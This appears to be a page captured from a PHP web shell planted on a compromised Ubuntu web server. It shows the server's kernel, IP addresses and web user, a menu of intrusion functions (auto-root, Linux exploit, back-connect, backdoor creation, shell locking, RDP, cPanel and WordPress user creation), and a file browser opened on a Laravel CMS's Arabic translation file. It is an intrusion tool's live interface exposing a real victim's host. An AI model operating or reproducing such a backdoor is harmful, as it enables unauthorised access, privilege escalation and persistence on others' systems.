Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.224.229.216
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dev /
core /
resources /
lang /
ar /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.php
745
B
-rw-r--r--
backend.php
33.6
KB
-rw-r--r--
frontend.php
3.68
KB
-rw-r--r--
installer_messages.php
1.5
KB
-rw-r--r--
pagination.php
546
B
-rw-r--r--
passwords.php
1.02
KB
-rw-r--r--
validation.php
9.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installer_messages.php
<?php return [ /** * * Shared translations. * */ 'title' => 'تنصيب نظام Smartend CMS', 'next' => 'متابعة', /** * * Home page translations. * */ 'welcome' => [ 'title' => 'تنصيب نظام Smartend CMS', 'message' => 'أهلا بك في صفحة تنصيب Smartend CMS', ], /** * * Requirements page translations. * */ 'requirements' => [ 'title' => 'المتطلبات', ], /** * * Permissions page translations. * */ 'permissions' => [ 'title' => 'تراخيص المجلدات', ], /** * * Environment page translations. * */ 'environment' => [ 'title' => 'الإعدادات', 'save' => 'حفظ ملف .env', 'success' => 'تم حفظ الإعدادات بنجاح', 'errors' => 'حدث خطأ أثناء إنشاء ملف .env. رجاءا قم بإنشاءه يدويا', 'wizard' => [ 'form' => [ 'db_connection_failed' => 'فشل الإتصال بقاعدة البيانات برجاء فحص المعلومات التي ادخلتها.', ], ], ], /** * * Final page translations. * */ 'final' => [ 'title' => 'النهاية', 'finished' => 'تم تنصيب البرنامج بنجاح...', 'exit' => 'إذهب إلى لوحة التحكم الآن', ], ];
Close